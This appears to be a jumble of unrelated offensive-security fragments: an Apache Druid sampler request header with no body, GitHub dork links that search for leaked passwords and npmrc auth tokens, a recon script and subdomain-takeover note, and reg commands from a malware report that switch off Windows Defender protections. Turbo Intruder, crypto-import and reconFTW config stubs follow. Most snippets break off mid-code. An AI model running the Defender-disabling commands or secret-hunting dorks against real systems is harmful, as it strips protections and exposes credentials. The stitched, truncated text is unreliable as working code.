POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1006
Connection: close
```
.
..
........
@
*
*.*
*.*.*
🎠
```
```bash
echo ""
echo "************ Github Dork Links (must be logged in) *******************"
echo ""
echo " password"
echo "https://github.com/search?q=%22$1%22+password&type=Code"
echo "https://github.com/search?q=%22$without_suffix%22+password&type=Code"
echo ""
echo " npmrc _auth"
```
```bash
#!/bin/bash
# Escape slashes in the name so it can be used as a folder name
folderName=$(echo "$1" | awk '{gsub("/","_")}1');
mkdir "$folderName" && cd "$folderName"
fqdn=$1;
ipList=$(dig +short "$fqdn" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'); # Get all A records (IPv4 addresses)
if [ -z "$ipList" ]
then
ipArgument=$fqdn
```
Read proper write-up here: https://publish.whoisbinit.me/subdomain-takeover-on-api-techprep-fb-com-through-aws-elastic-beanstalk
I have included my script in another file (main.sh), which I used in discovering this vulnerability.
I didn't do any form of manual work in finding this vulnerability, and my workflow was fully automated with Bash scripting.
I have shortened my actual script, and only included the part which helped me in finding this vulnerability in the main.sh file.
```
### Related to MalwareBytes LazyScripter https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtime
```
```python
# Gist of the Day: Turbo Intruder Cluster Bomb with SmartFiltering
# Author: Evan Custodio (@defparam)
#
# MIT License
# Copyright 2021 Evan Custodio
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
```
```python
#!/usr/bin/env python3
import re
import sys
import base64
from hashlib import sha256
from binascii import hexlify, unhexlify
from Crypto.Cipher import AES
from xml.dom import minidom
from pprint import pprint
```
```bash
#################################################################
# reconFTW config file #
#################################################################
# General values
tools=~/Tools # Path installed tools
SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" # Get current script's path
profile_shell=".$(basename $(echo $SHELL))rc" # Get current shell profile
reconftw_version=$(git rev-parse --abbrev-ref HEAD)-$(git describe --tags) # Fetch current reconftw version
generate_resolvers=false # Generate custom resolvers with dnsvalidator
```